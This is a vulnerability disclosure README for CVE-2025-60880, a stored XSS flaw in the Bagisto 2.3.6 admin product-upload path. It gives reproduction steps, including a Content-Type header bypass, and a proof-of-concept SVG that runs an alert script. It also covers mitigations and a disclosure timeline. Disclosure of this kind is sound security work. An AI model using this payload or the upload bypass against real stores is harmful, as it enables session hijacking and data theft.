CVE-2025-60880 - Stored Cross-Site Scripting (XSS) in Bagisto Admin Panel# CVE-2025-60880: Stored Cross-Site Scripting (XSS) in Bagisto Admin Panel
An authenticated stored XSS vulnerability exists in the Bagisto 2.3.6 admin panel's product creation path, allowing an attacker to upload a crafted SVG file containing malicious JavaScript code. This vulnerability can be exploited by an authenticated admin user to execute arbitrary JavaScript in the browser, potentially leading to session hijacking, data theft, or unauthorized actions.
---
## Vulnerability Overview
* **CVE ID**: CVE-2025-60880
* **Type**: Cross Site Scripting (XSS)
* **CVSS Score**: 6.9 (Medium)
* **CVSS Vector**: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:N
* **Affected Vendor**: Bagisto
* **Affected Product**: Bagisto
* **Affected Version**: v2.3.6
* **Affected Component**: Bagisto Admin Panel (Product Creation Path)
* **Attack Vector**: Remote
* **Authentication**: Admin privileges required
* **Impact**: Code Execution, Session Hijacking, Data Theft
---
## Proof of Concept (PoC)
The vulnerability is exploited when an authenticated administrator uploads a crafted SVG file containing malicious JavaScript.
**Steps to Reproduce:**
1. Log in to the Bagisto Admin Panel as an authenticated administrator.
2. Navigate to the product creation path.
3. Upload a crafted SVG file containing a JavaScript payload.
4. The request is replayed after modifying the Content-Type header.
5. The malicious SVG file is stored on the server.
6. When the file's URL is accessed, the JavaScript executes in the user's browser.
**Example Malicious SVG Payload:**
```xml
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.domain);
</script>
</svg>
```
---
## Recommendations
- To mitigate this vulnerability, the following actions are recommended:
- Enforce input validation, content-type enforcement, and proper file handling.
- Restrict file uploads to trusted formats and sanitize SVG files to remove potentially harmful content.
---
## Disclosure Timeline
| Date | Action |
| -------- | -------------------------------- |
| 2025 AUG | Vulnerability Discovered |
| 2025 AUG | Responsible Disclosure |
| 2025 AUG | CVE ID Requested from MITRE |
| 2025 OCT | CVE Assigned, Public Disclousure |
---
## Disclaimer
The information and proof-of-concept (PoC) code provided in this repository are for educational and ethical research purposes only. The author is not responsible for any misuse or damage caused by the information or code provided herein. The user assumes all responsibility for their actions. It is the user's responsibility to ensure they are compliant with all applicable local, state, and federal laws.
[4.0K] /data/pocs/add48852d75dffe2aa45c957907131d61c4fb4ff
├── [1.0K] LICENSE
└── [2.9K] README.md
1 directory, 2 files